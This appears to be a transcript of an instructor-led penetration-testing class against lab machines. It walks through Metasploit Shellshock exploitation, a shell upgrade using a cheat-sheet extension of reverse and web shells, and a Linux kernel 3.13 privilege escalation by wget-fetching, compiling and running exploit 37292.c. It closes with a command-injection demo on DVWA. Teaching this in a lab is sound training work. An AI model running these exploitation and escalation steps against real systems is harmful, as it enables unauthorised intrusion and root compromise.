everything is good. Now, before me executing exploit command, right? Can anyone tell me, will I get success or failure? If you feel like we'll get Meterpreter for sure, please drop 1 in the chat. If you feel like exploit may fail, please drop 2 in the chat. So it is not right answer, wrong answer. I just want to see your opinion, what you feel. Are we going to get success S or are we going to fail in this exploitation? Very good. People have a lot of trust on me. They are very confident that the exploit will work. But I think you all know me well. We are on day 4. You must have a proper understanding about me. Let's see what happens. Target URI fail. So option is clearly telling that there is a target URI that you need to set. Why? Why? This is why I picked shell shock. So it is not like you can directly go and attack the target. So you must tell this particular exploit code on which path of the target mission this particular shell script is available. It needs that path so that it can inject that malicious code to give you a reverse connection. So in case of Metasploitable 3, right, this is the path. Got it? So the full path is like var www.html And inside that we have this one. So where www.html is the default location for Apache. If it is running on a different machine, then you must change this. So set target URI. Now what you people say? Are we good enough? This time no one will answer, I think so. I intentionally execute all those things wrong. Pardon?
It will be successful.
I think we need to set timeout as well because that is mandatory.
Yes, yes, yes. Let's see. Great. We are there. Got it? So this is what I want you all to understand. Don't blindly go and load modules, run attack and so on. Try to understand, do a little bit of background research whenever you are using an exploit. What is that exploit doing? So we spent a lot of time on understanding that. Along with that, I explained you a few other concepts. Only after you identify that particular vulnerability there with the pre-exploitation steps, then you must come on to exploitation. Then only you can expect some kind of success in it, exploiting the target, right? So it is all about figuring out the right entry point or right loophole. Anyhow, we gained access to the target machine. Now, if I run a shell command, you can see I have a shell which is non-interactive. According to today's session, we must learn how to upgrade this normal shell. We already did all this shell thing in the last class with some other application. So to simplify your process of learning how to upgrade this shell, let me give you a browser extension, which is hack bar or hack tool. I think this is named as hack tool. Yes, hack tools. Please note down. Somehow you are not there with your notes while you are performing pen test. This particular extension is more than enough. It got every command that you want to learn. So if I go on reverse shells, you can see all those reverse shells that you can use, Perl based, Python based. So web shells, all PHP related web shells that you can execute on gaining access to the web application. TTY, you can actually spawn a new shell using all these commands, right? Linux useful commands, you can actually see how to find Linux privilege escalation related, SUID bit permission related programs on Linux, Linux related configuration files, right? Information about operating system, version of operating system, cron tab, right? I actually explained you all these things in the last class. Even the local file sh tunneling command, right? Remote tunneling, local tunneling. So you can actually use this particular extension as a cheat for all different commands that you need. So this will be very helpful in case of domain enumeration, Active Directory domain enumeration, file transfers. So using Netcat, how you can actually gain access to a shell.
This is on Firefox or on Google, sir?
I think you can get this on Chrome too. You can search for the Chrome extension. I am not sure whether it is available for Chrome or not.
What is the name of the extension?
It is Hack Tools.
Hack tool.
Hack-tools. So on this particular extension, there is a section for TTY, spawning a shell. I'm simply going to copy this particular Python script. Done. I have an interactive shell. Of course, if you follow the additional steps that are mentioned here, you can make it even more interactive, running clear screen, right? Or having a auto filling option working, right? You can export the term and set the actual terminal colors and all based on your choice. You can actually go and do a lot of other things. But this one is more than enough for us right now. So please note that I exploited the web server technology and gained access to the server now. Let's wrap up this with one kernel exploit on this Linux machine to gain root access. So in the last class, I've showed you how to perform Metasploit related privilege escalation on Windows using Metasploit module. But now let's take advantage of downloading a kernel exploit and then running that here. Are you all ready? I think we didn't cover that last week. Yes or no? We didn't did that last week.
No, sir, we don't.
Okay, right. So let's cover that thing here. And I will show you one more interesting privilege escalation on HSV box 1. So with that, we'll be wrapping up today. Anyhow, we have time for that. So let's complete this privilege escalation and we'll take a short break, right? So before we proceed on to privilege escalation, I'm going to move on to the temp directory because that is where I can execute, I can dump files and execute whatever thing that I want to. This particular mission is running Linux kernel 3.13. So this Linux kernel 3.13 is vulnerable and you can actually get an exploit code on exploit DB website or using searchsploit too. So let me switch to my desktop and use searchsploit to search for Linux kernel 3.13. A lot of privilege escalation, remote exploits, local exploits that you can see, but you must go very specific to the version that we have, 3.13, right, or 3.19. Anyhow, we are not concentrating on SGID bits or SUID bits, right? We are concentrating on the kernel version. Among all those things that are displayed on the screen, these two are relevant. And we know that it is 14.4, right? So you can simply run cat etc os-release. You can see 14.4. Okay, so you can manually perform it by reading the text content inside this text, or you can have this Linux C code, this C code, compile the C code on the target and then get the root shell. So for doing this job, I'm going to copy this module. I mean, using searchsploit -m. So searchsploit is a terminal utility that you can use on simplifying your job of searching for exploits which are already part of your Kali Linux, or else you can go on that target mission, website exploit DB and search for this information here and download it from here. That is one way. Anyhow, we have all those things on our Kali Linux, then you can simplify it. And we have this code on our desktop now. As this is a C code, we must compile it, then only we can run it. So to compile it on the target, we must have GCC installed. So is GCC installed on the target? So GCC tac version. Very good. GCC is installed on the target. This is how you can make job of attacker simple. So more basic utilities that are present, it becomes easy for them. If not, they can compile this on their computer and transfer it onto target machine. Now, I'm going to transfer this file onto the target machine, same exact Python server technique that I have used in the last class for malware transfer. So Python 3 -m http.server. We started the server. If we try to identify what is the IP address of this machine, it is 207. So this code, this file that is present inside this on desktop location is 37292.c. So I'm going to download it using wget http:// 192.168.0.207 8000, right, /37292.c 37292.c. Very good. We downloaded it. Now it is time to compile it. So to compile, the command is gcc 37292.c -o, and I want to save this as Reva, executable named as Reva. When I do ls-la, you can actually see all different files along with this Reva, which is executable this time. So let's run this Reva. Br root. So in the last class, we have seen how to perform privilege escalation using abusing sudo rights or SUID bit permissions. Now I showed you how to exploit the kernel version, right? So similar to 3.13 kernel, there are a lot of other Linux kernels that are actually vulnerable. You can exploit them, right? So there is one specific practical in the iLabs that shows you this process of exploiting Linux kernel version. So you can see how simple it is to gain access to a server through one single misconfiguration and then elevate our privileges on the server and become root user. All right. With this thing said, it's time for a short break. Let's break for 15 minutes and we'll see you all after break with exploitation on WordPress application. Right? All right, let's break for 15 minutes. Please be here by 4:20. All right. I hope all of you are here, my dear friends. If you are here, please drop back in the chat so that we can continue. Very good. All right. All right, let's move on to the last part for day 4. After going through a bunch of different missions, our last part is going to focus on one last device, which is HSV box 1. So there are so many misconfigurations that I have left on this box. I'm going to leave all those things for you to explore, right? Try to apply all the skills that you have learned in these modules for pen testing, both on internal, external, right? Try to figure out different ways of exploiting these applications that are present here. In fact, there is Drupal already present. Drupal added min exploit works, Drupal Garden works, right? So take advantage of HSVBox1, VBox and Metasploitable 3 and Metasploitable 2 devices. Okay, so those are more than enough for you to practice. So without wasting time, let's move on to the last part. So as part of this section, let's take advantage of some most common web application related vulnerabilities to gain access to the target server. Whenever we are taking advantage of exploiting a web server, if there is a web server related vulnerability, we can exploit it same as what we did before. But what if the web server software is not vulnerable? Then the only thing that is left with us is the web application. To identify web application related vulnerabilities, you must move towards enumerating that web application functionality. You must first know what is that web application meant for, what is that it is doing in the background, and so on. Just to understand this, there is DVWA that is already present on this Metasploitable, sorry, HSV box. So 192.168.0.141. You can see DVWA under DVWA location. Is it not 141? I think my mission lost the network connection. Disconnect. Connect back. 206. Now if I try accessing 192.168.0.141, DVWA, we are able to see it. I hope most of you already know how to exploit XSS, SQL injection as part of previous module. And how many of you have used DVWA before? If you are new to it, please note down the credentials. It is admin as username and password as password. This is one common web vulnerable web application that comes pre-built with your Metasploitable 2 also, right? Which opens up an opportunity for you to learn most common injection vulnerabilities, right? And few other common functionality related loopholes that you can exploit to gain access. Anyhow, this course is not going to focus on all different web application vulnerabilities. Let us look at 3 major things that are really important for us to explore. One is SQL injection, the other one is local file inclusion or remote file inclusion, and the third one is command injection. Before we directly jump onto exploiting them in the real life application, let's take a simple overview of how this command injection thing works. These are quite common nowadays because wherever you see some kind of search bar, you can try them, but don't blindly go and execute whatever payload that you have in hand. Try to understand what is the functionality of it. For example, there is a website that actually performs command execution. I mean, if you go on ping.eu, ping.eu is actually meant for executing ping commands. So whatever IP address or domain name that you specify, it is going to do ping on that particular IP. I think they moved this ping.eu. Is it not there? Yes, it is there. You can see ping. So whatever input that you provide, it is going to perform that ping and then display the result. So what is the functionality of this input field? It is simply taking that host name or IP address and then putting that as part of the ping command on the Linux machine or whatever server operating system. Yes, it is running on Apache. If I'm not wrong, it must be running it on Linux machine only, right? So it will put this on the command prompt, execute ping command and bring that result and display that on this web application. So with this example, try to understand what kind of web application it is, what is the actual operation that is doing in the background. So similar to that, there is a ping device here. Ping functionality for this web application also. Using this, I can actually ping anything that I want. So if I go on google.com, you can see it performed it. But wait, it is asking for IP address, but it is also taking domain name. Isn't it a misconfiguration? So there must be a smart technique that actually identifies and differentiates IP addresses with domain names. If you are interested in taking only IP addresses, you must take only IP addresses. You must not take domain names. Chalo, that is one thing that can be neglected. But when I go and execute some normal commands, is it going to take? No. If I go and execute pwd, no. Right? This is where there will be a tough fight between developers and security engineers. Developers will always feel like this is a functionality that I must implement based on the client's requirement. But from security point of view, it's okay, fine, you are putting the actual functionality, but it is exploited by attackers in a different fashion. So developers feel like no one will execute ls command here, but there is a possibility that attacker can execute ls command also. This is where you must put restrictions on what it can accept and what it cannot accept. Say if I type some IP address 192.168.0.206 or 206 is the IP address of my Kali Linux machine. Very good. You see this ping result. This is same as how many pings it is performing. It is performing ping for 4 times. So ping -c4, right? So this is the command that the application is going to execute on the server computer. Hello, please note who is executing this. This server 141 is executing. So on the terminal of that server, this ping command will be executed with whatever IP address that I mentioned. This is great. It's working fine. Very good. But do you know that there is a possibility of appending commands? Hello, it executed pwd ls-l. Hello, are you all understanding? I can take advantage of appending commands.
Is it the remote PWD or it's an local system PWD?
Just I'm doing it on my Kali Linux. It is local system only. There is no difference.
Okay, okay.
Right now we are doing it on the local machine just to understand how it works. Then we'll apply the same to the web application. So I can take advantage of piping this content and then executing it on the target, right? I don't know why okay, sorry. We don't have files on desktop. So let me do it on my home location. Now are you observing that? Instead of executing ping, it actually executed this. The pipe command here is actually putting the output of this command onto the input of the second command. If we know that there is a possibility of executing multiple commands from one single prompt, how about trying that here? If the web application developer is not taking care of understanding